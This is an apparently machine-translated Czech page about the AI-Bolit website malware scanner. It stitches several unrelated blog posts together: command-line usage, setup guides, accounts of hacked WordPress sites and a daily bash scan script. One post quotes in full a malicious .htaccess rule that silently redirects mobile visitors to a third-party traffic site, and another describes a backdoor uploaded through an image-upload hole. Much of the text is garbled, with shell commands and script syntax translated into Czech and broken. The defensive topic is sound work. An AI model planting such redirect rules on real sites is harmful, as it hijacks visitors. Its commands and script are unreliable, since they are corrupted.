Domov › Nastavení › Ai bolit recenze. Jak pracovat se skenerem AI-BOLIT z příkazového řádku. Jak funguje skener AI-Bolit

Ai bolit recenze. Jak pracovat se skenerem AI-BOLIT z příkazového řádku. Jak funguje skener AI-Bolit

Největší funkčnost je k dispozici při spuštění skeneru AI-BOLIT v režimu příkazového řádku. To lze provést jak pod Windows/Unix/Mac OS X, tak přímo na hostingu, pokud máte přístup přes SSH a hosting nijak výrazně neomezuje spotřebované zdroje procesoru.

Upozorňujeme, že ke spuštění skeneru je vyžadována konzolová verze PHP 7.1 a vyšší. Starší verze nejsou oficiálně podporovány. Zkontrolujte aktuální verzi pomocí php -v

Pomoc s parametry příkazového řádku skeneru AI-BOLIT

Zobrazit nápovědu

php ai-bolit.php --help

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Skenujte pouze určitá rozšíření

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl

Připravte soubor karantény pro odeslání bezpečnostním specialistům. Bude vytvořen archiv AI-QUARANTINE-XXXX.zip s heslem.

php ai-bolit.php --karanténa

Spusťte skener v „paranoidním“ režimu (doporučeno pro získání co nejpodrobnější zprávy)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Zkontrolujte jeden soubor „pms.db“, zda neobsahuje škodlivý kód

php ai-bolit.php -jpms.db

Spusťte skener s velikostí paměti 512 Mb

php ai-bolit.php --memory=512M

Nastavte maximální velikost skenovaného souboru na 900 kb

php ai-bolit.php --size=900K

Pauza 500 ms mezi soubory při skenování (pro snížení zatížení)

php ai-bolit.php --delay=500

Odeslat zprávu o skenování e-mailem [e-mail chráněný]

php ai-bolit.php [e-mail chráněný]

Vytvořte zprávu v souboru /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Prohledejte adresář /home/s/site1/public_html/ (pokud není zadána možnost --report=report_file, bude zde vytvořena výchozí sestava)

php ai-bolit.php --path=/home/s/site1/public_html/

Po dokončení skenování proveďte příkaz.

php ai-bolit.php --cmd="~/postprocess.sh"

Získejte přehled v prostém textu s názvem site1.txt

php ai-bolit.php -lsite1.txt

Hovory můžete kombinovat např.

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,podezření

Kombinací volání skeneru AI-BOLIT s dalšími unixovými příkazy můžete provádět například dávkové skenování stránek. Níže je uveden příklad kontroly několika webů hostovaných v rámci účtu. Pokud jsou například stránky umístěny v adresáři /var/www/user1/data/www, příkaz ke spuštění skeneru bude

najít /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;

Přidáním parametru --report můžete ovládat adresář, ve kterém se budou generovat zprávy o skenování.

php ai-bolit.php seznam parametrů... --eng

Přepněte rozhraní sestav do angličtiny. Tento parametr by měl být poslední.

Integrace s dalšími službami a do hostingového panelu

php ai-bolit.php --json_report=/cesta/soubor.json

Vygenerujte zprávu ve formátu json

php ai-bolit.php --progress=/path/progress.json

Uložte stav ověření do souboru ve formátu json. Tento soubor bude obsahovat strukturovaná data ve formátu json: aktuální skenovaný soubor, kolik souborů bylo naskenováno, kolik souborů zbývá ke skenování, procento skenování, čas do dokončení skenování. Tento mechanismus lze použít k zobrazení ukazatele průběhu a dat o skenovaných souborech v panelu. Po dokončení skenování se soubor automaticky odstraní.

php ai-bolit.php --handler=/cesta/hander.php

Externí obsluha události. Můžete přidat vlastní obslužné rutiny pro zahájení/ukončení skenování/průběh skenování/chybu skenování. Ukázkový soubor lze zobrazit v archivu skeneru v adresáři tools/handler.php. Například po dokončení skenování můžete se souborem zprávy něco udělat (poslat poštou, archivovat atd.).

Nastala problematická situace – stránka s viry.

Nyní ukážu, jak lze tento virus snadno najít a zničit. První věc, kterou musíte udělat, je stáhnout web do národního prostředí – je mnohem snazší zkontrolovat pole souborů.

Tento text je z popisu videa, takže je trochu chaotický a fádní. Nicméně zbytek mých spisů)

Stáhneme filezillu. Stáhnu si ho přímo na nainstalovaný lokální server - Open Server - abych ho mohl spustit lokálně, kdybych ho náhle potřeboval.

Pokud máte nainstalovaný antivirus, který skenuje soubory za chodu, existuje šance, že viry v některých souborech najdete i během stahování. Podívejte se do protokolů mého antiviru.

V mém případě můj Microsoft Security nic neukázal - virus pro něj nebyl znám.

K vyhledávání použiji speciální antivirus - Aibolit. Web vývojáře http://revisium.com/ai/
Doporučuji, přijďte se na seminář podívat. Soubory se stále stahují, bude to trvat dlouho. Lokální kopii už mám připravenou, včera jsem si s tímto antivirem hrál.

Takže pro práci stále potřebujeme php pro Windows. Stáhněte si zde http://windows.php.net/download/ nejnovější verzi pro Windows v archivu zip. Vybalte se někde, kde se cítíte pohodlně.

OK. Přípravy skončily. Teď do práce.

Stáhněte si archiv pomocí iBolit.

Uvnitř jsou tři složky:

ai-bolit je skutečným jádrem antiviru
známé_soubory – verze antivirových databází souborů pro různé motory
nářadí – pomocná utilita.

Začněme tedy web ošetřit na viry.

Zkopírujte všechny soubory ze složky ai-bolit do kořenového adresáře webu
Pokud víme, jaký engine máme, vybereme složku s naším CMS ve složce známé_soubory a všechny soubory dáme do kořene. V mém případě WordPress engine pak viry ošetříme antivirovými databázemi pro WordPress. Pokud chcete vše zkontrolovat obecně, můžete vyplnit antivirové databáze ze všech enginů - možná to najde něco víc)
Znovu jsem zapomněl – v nastavení iBolit je potřeba specifikovat odborný provozní režim. Chcete-li to provést, otevřete soubor ai-bolit.php pomocí textového editoru a najděte řádek define(‘AI_EXPERT‘, 0); změňte „0“ na „1“ a je to – expertní režim je zapnutý.
Nyní musíme náš zip archiv s php rozbalit do nějaké složky, kde by se s ním dalo pohodlně pracovat. Potřebujeme soubor - php.exe
Nyní musíme spustit spustitelný soubor našeho antiviru. Chcete-li to provést, dvakrát klikněte na ai-bolit.php. Už mám na výběr, jak tento skript spustit.

Doporučil bych ponechat pouze složku pro nahrávání a složku s tématem. Všechny pluginy budou staženy, nastavení zůstane v databázi – viry se jich nedotknou. Zkontrolujte téma ručně všechny soubory - naštěstí jich tam není mnoho, pokud web nevykreslil nešikovný návrhář layoutu. A doplňte vše ostatní do motoru. toto je nejspolehlivější způsob.

A také připomínám, že viry máte s největší pravděpodobností v celém svém hostingovém účtu (velmi zřídka se jim podaří přeskakovat mezi účty různých uživatelů, pouze pokud je správce hostingu křivák.)

Pokud je z nějakého důvodu iBolit z webu odstraněn, můžete si antivirus pro web vždy stáhnout ode mě

Viry jsou smutné (

PS: dva články o tom, jak vyčistit již nalezené viry:

Jednodušší – Jak sami zdarma odstranit virus z webu
Pro pokročilé -

Jste si jisti, že vaše stránky nejsou napadeny viry? Zkontrolovali jste stránky online antivirem? Zapomeňte, online antiviry nikdy nebudou schopny najít viry vložené na váš web zkušenými hackery.

Maximálně mohou identifikovat škodlivé skripty, které jste si sami neúmyslně nainstalovali na svůj web. Proto potřebujeme radikálnější metody kontroly webu na přítomnost virů, které nelze jen tak přeskočit, ale podívat se dovnitř vašeho projektu.

Jak zdarma a zdarma zkontrolovat web na přítomnost virů?

Tento článek bude hovořit o několika způsobech, jak zkontrolovat, zda váš web neobsahuje viry:

Online antiviry jsou nejjednodušší, ale také nejnespolehlivější metodou.

Aibolit antivirus je nejspolehlivější, ale také nejobtížnější metoda.

Antivirový web Virusday - nejlepší možnost.

Nejprve ale něco málo o tom, jak nebezpečný virus na webu je.

Jaká jsou nebezpečí hackování webových stránek?

Nejprve ale trocha teorie a osobních zkušeností – zlomily mě nejednou. Proč je web infikován virem? Jakmile útočníci získají přístup k vašemu webu, mohou provést následující:

Začnou „odčerpávat“ váš provoz do svých projektů.
Stáhněte si obsah serveru a databáze za účelem prodeje třetím stranám.
Nahradí kontaktní nebo platební údaje na webu a stáhnou osobní údaje uživatelů.
Budou na vašem webu zveřejňovat dveře s odkazy na spam.
Zavedou na webové stránky viry, trojské koně nebo exploity, které infikují návštěvníky.
Budou posílat spamové zprávy z vašeho serveru.
Prodají přístup k napadené stránce dalším útočníkům za účelem následného neoprávněného vstupu.

Je důležité pochopit: stránky s viry mohou podléhat sankcím vyhledávačů a ztrácejí pozice. Můj hosting byl více než jednou bombardován hackery a napadli ho pomocí . Proč se to dělá? Cíl je jednoduchý: získat přístup ke svým heslům nebo vložit virus na váš web prostřednictvím zranitelnosti v kódu.

A podařilo se jim to, protože jsem již dvakrát odstranil dveře, které zaplavily, z mých stránek. Ale to je polovina problému, protože mé stránky byly poté infikovány a dokonce ani změna hesla nepomůže. A prostě neexistují žádné záruky, že se vše nebude opakovat.

Poté, když znovu zadám adresu, přejdu na web a panel správce také. V čem je problém, stále nevím. Na tomto webu, můj nejnovější, nic takového není. Takže se ještě nedostal pod útok DDOS...

Nejjednodušší způsob, jak vyléčit web, je vše zbourat a znovu nainstalovat skript webu. Ale jak víte, toto je extrémní opatření, ke kterému by se mělo uchýlit pouze jako poslední možnost. A kromě toho, škodlivý kód lze do šablony zašít, ale nelze jej nahradit. Proto se nejprve musíme pokusit zjistit, zda je naše stránka infikována nebo ne? Jak to udělat?

Kde zkontrolovat web na přítomnost virů online?

Kontrola webu na přítomnost virů online – i když tato metoda není nejúčinnější, jak jsem psal výše, můžete s ní začít. Je tam dobrá obsluha Antivirový alarm .

Stačí zadat adresu webu a počkat, až služba zkontroluje váš web na přítomnost virů. Pokud zjistí něco podezřelého, uvede to v protokolu. Pokud ale ani tento online antivirus nic nenajde, zkuste pokročilejší řešení.

Jak zkontrolovat web na přítomnost virů pomocí skriptu?

Zrovna před týdnem jsem zkontroloval všechny své stránky pomocí antiviru Aibolit a zjistil jsem, že můj hlavní web je infikován.

Co je to za antivir a jak s ním pracovat?

Tento antivirus lze stáhnout z webu vývojářů - Aibolit . V současné době existuje verze pro Windows, dříve bylo možné pracovat pouze přes hosting.

Co může tento antivirus udělat pro web?? Zde je co:

- hledejte na hostingu viry, škodlivé a hackerské skripty: shelly založené na signaturách a flexibilních vzorech, shelly založené na jednoduché heuristice - vše, co běžné antiviry a skenery nenajdou.
— hledejte zranitelné skripty timthumb, fckeditor, uploadify a řadu dalších.
— hledat v .htaccess přesměrování na škodlivé stránky.
— vyhledejte kód výměn odkazů, jako je sape/trustlink/linkfeed/… v souborech .php
— definovat adresáře a soubory dveří.
— hledat v šablonách prázdné odkazy (neviditelné odkazy).
— zobrazit adresáře otevřené pro zápis.
- práce se všemi cm bez výjimky (joomla, wordpress, drupal, dle, bitrix, phpbb,...)
— odeslat zprávu e-mailem nebo uložit do souboru.

Instalace je jednoduchá: rozbalte archiv a nahrajte do složky s naše stránky, v mém případě je to .aknown.wp_3_8_1 pro wordpress. Možná budete muset nastavit správná oprávnění k souboru, například 755.

No a kdo má správný hosting, musí se přihlásit do terminálu (mám Linux, takže žádné emulátory nejsou potřeba) a pak se připojit k našemu hostingu přes SSH.

Ssh LOGIN@SERVER_ADDRESS

Nebudu vysvětlovat, jak to přesně udělat, pokud nejste v předmětu, pak je potřeba individuální přístup, napište do komentářů, vysvětlím.

Po připojení musíte pomocí příkazu cd přejít do složky s webem. Dále zadáme příkaz:

Php ai-bolit.php

Poté začne skenování, které bude trvat poměrně dlouho v závislosti na velikosti webu. Po dokončení se ve složce s webem objeví soubor s přibližným názvem AI-BOLIT-REPORT-07-04-2014_23-10-719945.html

Otevřeme soubor a analyzujeme co a jak. Na začátku jsem například dostal:

Byly nalezeny podpisy skriptů prostředí. Podezření na škodlivý skript: (12)

Ale ve skutečnosti se ukázalo, že existuje pouze jeden virus a zbytek detekcí se týkal certifikátů, které jsou podobné šifrovaným záznamům.

Nejjednodušší způsob, jak to zjistit, je stáhnout si čistý WordPress nebo cokoli jiného a porovnat podezřelé soubory. Pokud je v originále vše stejné, tak není třeba se obávat. Pokud ne, pak škodlivý kód odstraníme. Dále jsem nadával na:

Dvojité rozšíření, šifrovaný obsah nebo podezřelý škodlivý skript. Požadovaná další analýza: (14)

Antivir si stěžoval na jeden plugin - TOP 10 - nejsem si jistý, že je problém. Stejně tak další nebezpečí byla falešně pozitivní.

Heuristická analýza si stěžovala i na soubory Wordpress, ale zkontroloval jsem je s originály a vše bylo v pořádku.

Tyto soubory obsahují neviditelné odkazy. Podezření z odkazového spamu:

Zde jsem plugin, který vytváří tlačítko NAHORU - byl v něm skrytý odkaz.

I když s ohledem na pluginy musíte pochopit, že téměř všechny mají odkazy. To se ale dá vyřešit jednoduše zavřením složky s pluginy z indexace. Ve WordPressu to lze provést zadáním řádku v robot.txt Disallow: /wp-content/plugins

V každém případě bude vše velmi individuální, takže je těžké napsat něco konkrétního. Účelem článku je spíše poskytnout směr.

Tady by bylo vše v pořádku, ale chybí jedna věc – neustálé sledování. Tento antivirus nespustíte každý den a hackeři pracují sedm dní v týdnu. A zde nám pomůže další vynikající služba. Jak pomocí služby zkontrolovat web na přítomnost viru?

Automatické skenování stránek na přítomnost virů

Nedávno se služba objevila Virusday , který může neustále monitorovat web na přítomnost virů. Vše vypadá velmi pěkně a funkčně vyléčení webů od virů je nejpohodlnější zde:

Je třeba k nim přidat svůj web a stáhnout synchronizační soubor PHP, který se nahraje do kořenového adresáře webu. Dále můžete spustit synchronizaci a služba zkontroluje, zda váš web neobsahuje viry.

V bezplatné verzi jsou možnosti omezené, takže pokud si svého webu vážíte, můžete si trochu zaplatit a být v klidu – služba vyhledá viry a okamžitě je ošetří.

Na jednom webu byl objeven virus. Tento web právě načítal můj server, dokud jsem nevypnul protokol vzdáleného publikování. Problém zmizel, ale virus zůstal:

No, zkusme odstranit infekci. Ne, není tomu tak, služba nechce virus odstranit zdarma, pouze poskytla následující informace:

Nalezené hrozby: h.ExternalRedirect
Konfigurační soubor WEB serveru obsahuje pokyny, které podmíněně nebo bezpodmínečně přesměrovávají uživatele webu na zdroje třetích stran. Doporučeno odstranění.

Jak odstranit virus, který jsem našel na webu? Zkusím to najít ručně, nebo se možná zaregistruji k placenému plánu, protože zabezpečení webu je velmi důležité. I když jsem s největší pravděpodobností přinesl tuto infekci ze sdíleného hostingu, nyní mám skvělé VPS a nebyly žádné problémy. Tak, zaregistrujte se na Virusday a připojte svůj web.

Zde je návod, jak zkontrolovat, zda na vašem webu nejsou viry, pokud znáte jiné způsoby, a dokonce lepší než tyto, pak by o nich měl zájem vědět každý...

Včera se mi stala nepříliš příjemná příhoda – všechny mé stránky byly infikovány. Je dobře, že jsem byl u počítače a hned jsem si všiml problému. Co se stalo?

Jedna z mých stránek se najednou začala převádět na jakousi seznamku, mírně řečeno neslušnou stránku. Když jsem přešel na svou doménu, byl jsem okamžitě přesměrován na tuto spamovou stránku.

To je velmi špatná situace, protože pokud problém nevyřešíte hned, mohli byste odstrašit své návštěvníky. A pokud to bude trvat delší dobu, vyhledávače mohou na váš web uložit filtr a ztratíte všechny pozice ve vyhledávání.

O tom jsem již psal, ale v tomto případě bylo nutné virus rychle najít. Okamžitě jsem začal ručně vyhledávat škodlivý kód.

Vzhledem k tomu, že přesměrování přicházelo ze všech stránek, myslel jsem si, jaký skript je vložený do záhlaví (header.php) nebo zápatí (footer.php). Ale žádný cizí kód tam nebyl.

Okamžitě jsem kontaktoval podporu hostingu:

— Mám takový web, začal se přesměrovávat na nějaký neslušný zdroj, pomozte mi vyřešit problém.

Ale než mi stihli odpovědět, sám jsem uhodl, kam se ještě musím podívat. V souboru .htaccess, který se nachází v kořenovém adresáři webu, jsem našel následující kód:

RewriteEngine On RewriteBase / RewriteCond %(HTTP_USER_AGENT) android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+ mobile|midp|mmp|netfront|palm(os)?|telefon|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(prohlížeč|odkaz)| vodafone|wap|windows (ce|phone)|xda|xiino RewriteCond %(HTTP_USER_AGENT) ^(1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s- )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di |-m|r |s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob |do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze) |fetc|fly(-|_)|g1 u|g560|gen|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p |t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu( aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt(|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50 |54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)| mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1) |10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan( a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar| sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo |to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk (40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g |nc|nw)|wmlb|wonu|x700|yas-|vaše|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF 0,50,8 >>>>> >> SECURE.HTACCESS

Jakmile jsem to odstranil, vše začalo fungovat jak má. Vše mi trvalo 5 minut. Ale pokud by na mém místě byl úplný začátečník, tak by mu to mohlo zabrat hodně času, pokud by i sám našel problém.

Ke svému zděšení jsem zjistil, že všechny mé stránky byly infikovány podobným způsobem. Okamžitě jsem problém vyřešil a napsal na podporu hostingu:

Všechny mé stránky byly infikovány, což znamená, že vše na vašem hostingu bylo infikováno, bylo by dobré lidi varovat.

Na kterou přišla odpověď:

„Infikovány byly pouze soubory vašich stránek“. V důsledku toho mají některé z vašich webů chyby zabezpečení, které byly použity ke změně souborů na vašem účtu. Chcete-li tyto chyby zabezpečení najít a opravit, musíte se obrátit na webového vývojáře.

Možná ano, nemohu zkontrolovat. Není to poprvé, co se někdo pokusil infikovat mé stránky na tomto hostingu. Mají všichni webmasteři takové problémy? Nebo je to jen na mém hostingu?

Není to můj první hosting a nikdy jsem nikde takové problémy neměl. Stále více se přikláním ke změně hostingu např. na TENTO.

Než jsem stihl tento problém vyřešit, technická podpora mi napsala, že můj druhý web posílá spam. Jak se ukázalo, do složky se mi jedním pluginem nahrál cizí php soubor a přes něj se nějak rozesílal spam.

Tento soubor jsem smazal a problém byl vyřešen. Už mám jasný dojem, že WordPress je to samé jako Windows, a co s tím dělat?

Pravděpodobně každý, kdo vytváří webové stránky, se na webu setkává s viry a trojskými koni. Prvním problémem je všimnout si problému včas, než se projekty stanou pesimistickými z vyhledávačů nebo zatěžují hostitele (pro DDoS, spam).

Tento článek vzniká hned po tom, co při rutinním zálohování na počítač s Windows zdrojový kód webu ESET Smart Security náhle začal nadávat na obrázky, které považoval za virus. Ukázalo se, že backdoor FilesMan byl na stránky nahrán pomocí obrázků.

Ta díra spočívala v tom, že skript, který uživatelům umožňoval nahrávat obrázky na web, zkontroloval, že se obrázek načítá pouze podle přípony souboru. Obsah nebyl vůbec zkontrolován. Není to nutné;) Výsledkem je, že jakýkoli soubor PHP může být nahrán na web pod rouškou obrázku. Ale nemluvíme o dírách...

Jde o to, že vznikl úkol každodenní kontroly všech souborů webu na viry a trojské koně.

Kontrola webové stránky na přítomnost virů online

Online kontroly jakékoli webové stránky na přítomnost virů nejsou pro tyto účely vůbec vhodné. Online prohledávače se chovají jako robot vyhledávače a postupně procházejí všechny dostupné stránky webu. K přechodu na další stránku webu dochází prostřednictvím odkazů z jiných stránek webu. Resp. pokud útočník nahrál na váš web zadní vrátka pomocí obrázku a odkaz na tento obrázek není nikde na stránkách webu a web neznečišťoval, stejně jako když na stránky pověsí virus, pak online antivirová kontrola webu jednoduše provede nenajde tento obrázek a nenajde virus.

Ptáte se, proč by to útočník dělal? Proč nahrávat zadní vrátka a nedělat nic? Odpovím – za spam, za DDoS. Za jinou škodlivou činnost, která se nijak neprojeví na stránkách webu.

Jedním slovem, kontrola webové stránky online na přítomnost virů je pro naprostý klid zcela zbytečná.

Plugin pro kontrolu webu WordPress na viry a trojské koně

Pro WordPress existuje výborný antivirový plugin. Jmenuje se . V mém případě dokonale našel obrázky z FilesMan a vyčistil web od virů. Má to ale důležitou nevýhodu. Během skenování to velmi zatěžuje server, protože jednoduše prochází všechny soubory postupně. Odhlašování z krabice se navíc provádí pouze ručně. Není možné automatizovat ověření stránek pomocí pluginu.

Inu, virus můžete chytit i bez použití WordPressu, potřebujete něco univerzálního.

Kontrola obsahu stránek běžným antivirem

Jak již bylo zmíněno výše, problémy objevil zcela náhodou běžný desktopový antivir při zálohování. Celý web si samozřejmě můžete každý den stáhnout a naskenovat běžným antivirem. To vše je docela funkční.

Za prvé, chci automatizaci. Aby kontrola byla automatická a na základě výsledků byl hotový report.
za druhé, existují weby, kde jejich stahování pokaždé není reálné,

Zkouším AI-Bolit

S úvodem jsem něco zdržel. V důsledku všech hledání jsem našel vynikající bezplatný antivirus pro web. . Tento antivirus zahrnuje různá schémata jeho použití. Používal jsem to přes ssh.

Nepřišel jsem na to, jestli to lze použít na sdíleném hostingu, ale myslím, že je to možné. AI-Bolit je napsán v PHP a lze jej spustit z prohlížeče. Čistě technicky je to tedy pravděpodobně možné na sdílené platformě.

Důležité! Aibolit neošetřuje web pro viry – POUZE je NAJDE a hlásí, které soubory považuje za nebezpečné. A vy sami se rozhodnete, co s nimi uděláte. Proto jednoduše hloupé stisknutí tlačítka a vyléčení webu z trojských koní nebude fungovat.

Jak používat AI-Bolit na VDS s ssh

Aibolit má pokyny a mistrovské kurzy o používání tohoto antiviru. Obecně je pořadí jednoduché:

stáhnout
rozbalit na server (rozbalil jsem do /root/ai)
poté z konzoly ssh spusťte php /root/ai/ai-bolit/ai-bolit.php
ověření může v závislosti na velikosti webu trvat hodiny
Na základě výsledků kontroly bude vygenerován soubor hlášení AI-BOLIT-REPORT-<дата>-<время>.html

Soubor zprávy zobrazí problematické soubory, pokud existují.

Velké zatížení serveru

Hlavním problémem, na který narazíte při automatické kontrole webové stránky na přítomnost virů, je zatížení serveru. Všechny antiviry fungují stejným způsobem a postupně prohledávají všechny dostupné soubory. A zdá se, že aibolit zde není výjimkou. Jednoduše vezme všechny soubory a zkontroluje je jeden po druhém. Zátěž naskakuje a to může vydržet dlouho, což je ve výrobě nepřijatelné.

Ale Aybolit má úžasnou příležitost (za předpokladu, že máte plnohodnotný server nebo VDS s přístupem root). Za prvé, pro Aibolit můžete vygenerovat seznam souborů ke kontrole a poté tento seznam nahrát. Pak Aibolit jednoduše projde tento seznam.

Chcete-li vygenerovat seznam, můžete použít jakoukoli serverovou metodu. Skončil jsem s tímto bash skriptem:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="site" AI_PATH="/root/ai" NOW=$(datum +" %F-%k-%M-%S") # můžete vytvořit veřejnou složku s přístupem pomocí hesla REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Kontrolovat pouze soubory změněné v X dny # AI-BOLIT-DOUBLECHECK.php je pevně zakódován AIbolit na --with-2check !!! najdi $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

# bash /root/ai/run.sh

# https://revisium.com/kb/ai-bolit-console-faq.html

DOMAIN = "web"

AI_PATH = "/root/ai"

NYNÍ = $(datum + "%F-%k-%M-%S")

# můžete vytvořit veřejnou složku s přístupem pomocí hesla

REPORT_PATH = "$AI_PATH/reports/$DOMAIN-$NOW.html"

SCAN_PATH = "/home/azzrael/web/$DOMAIN/public_html/"

SCAN_DAYS = 90

#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH

php "$AI_PATH/ai-bolit/ai-bolit.php"-- mode = 1 -- report = $REPORT_PATH -- s - 2zaškrtněte

#historie -c

Zde můžete vidět, že příkazem find shromažďujeme všechny soubory vytvořené během posledních SCAN_DAYS, ukládáme je do seznamu AI-BOLIT-DOUBLECHECK.php (mimochodem, v době použití nebylo možné soubor seznamu přejmenovat ), pak tento seznam předejte Aibolitu. SCAN_DAYS se může rovnat jednomu dni. Pokud do denního cronu vložíte bash /root/ai/run.sh, pak seznam souborů ke kontrole nemusí být příliš velký. Resp. kontrola nezabere mnoho času a server příliš nezatíží.

Nedávno jsem si na jednom z mých projektů všiml, že bylo spuštěno přesměrování na reklamní zdroj třetí strany. Nejedná se o tak zřejmý hack webu, kdy úplně přestane fungovat, ale o skrytý způsob krádeže návštěvnosti. Útočník může například přesměrovat pouze uživatele z mobilních zařízení nebo způsobit, že se skript spustí nekonzistentně, aby si vlastník projektu nevšimnul ztráty publika. Ať je to jakkoli, toto vše není pro váš web příliš dobré, a to jak z pohledu návštěvníků, kteří se nedostanou na správné stránky, tak to může způsobit problémy na straně vyhledávačů, pokud se náhle přesměrování dostane na zdroj s viry.

Dnes se podíváme na jeden užitečný skript PHP, AI Bolit, který vám umožňuje najít viry na vašem hostingu, abyste se zbavili různých škodlivých kódů. Řešení je zcela zdarma a jeho použití není složité.

Tento skript má 3 možnosti vydání:

AI Bolit pro Windows – umožňuje analyzovat web lokálně po jeho stažení do počítače.
Klasická možnost kontroly hostingu na viry (vhodné i pro Unix a Mac OS X).
Nový webový skener (ReScan.pro) – kontroluje webové stránky online.

Poslední možnost, jak chápete, je nejjednodušší, nehledí však přímo na soubory umístěné na hostingu, ale pouze selektivně skenuje některé webové stránky. Taková povrchní kontrola vám nemůže sdělit konkrétní zdroj problému na webu, ale pomůže vám jej odhalit.

Někteří uživatelé považují skript AI Bolit pro Windows za nejznámější a nejjednodušší verzi, protože... mnoho lidí pracuje s tímto OS. Přesto bych doporučil spustit antivirovou kontrolu na vašem hostingu. Není zde nic složitého a níže o tom všem řeknu více.

Princip a vlastnosti AI Bolit

Chcete-li používat AI Bolit, musíte provést následující kroky:

Stáhněte si skript z webu programu.
Rozbalte a nahrajte na svůj hosting.
Spusťte AI Bolit, jak je uvedeno v dokumentaci.
Po dokončení kontroly obdržíte výsledek analýzy webu.
Poté můžete problémy vyřešit sami nebo vyhledat pomoc specialistů.

Poslední bod vysvětluje, proč je tak skvělý a výkonný PHP skript AI Bolit distribuován zdarma. Myslím, že po zjištění problémů a virů na hostingu se mnoho uživatelů obrací na vývojáře s žádostí o další služby. Celkem logický přístup. Řešení je mimochodem patentováno a má jedinečný algoritmus a oblíbené weby ru-hosting ho doporučují/používají ve své práci. Vzpomínám si, že jsem jednou požádal technickou podporu hostitele o pomoc ohledně problémů s jednou webovou stránkou, a ta začala pomocí AI Bolit kontrolovat hosting na viry. Po tomto incidentu jsem se dozvěděl o existenci tohoto řešení :)

Hlavní výhody a vlastnosti AI Bolit:

vyhledávání různých typů škodlivého kódu: viry, shelly, zadní vrátka, veřejná zranitelnost ve skriptech;
bezplatná distribuce;
použití speciální patentované heuristické analýzy;
relativně snadná instalace a konfigurace;
aktuální databáze virů a škodlivých skriptů;
kontrola hostingu na viry pro jakékoli webové stránky a CMS;
práce s různými operačními systémy: Windows, Unix, MacOS;
doporučení od předních hostingových společností.

Jak používat AI Bolit

1. Skript AI Bolit si můžete stáhnout kliknutím na tento odkaz na webu s jeho popisem. Pro kontrolu virů na vašem hostingu doporučujeme zvolit univerzální verzi(!). Poté začne automatické stahování souboru ai-bolit.zip.

2. Dalším krokem je rozbalení a nahrání na hosting. Pro práci s FTP používám bezplatný program FileZilla (výborný FTP klient). Po rozbalení ai-bolit.zip najdete instalační dokumentaci uvnitř v souboru readme.txt. Pokud chcete, můžete se s ním seznámit.

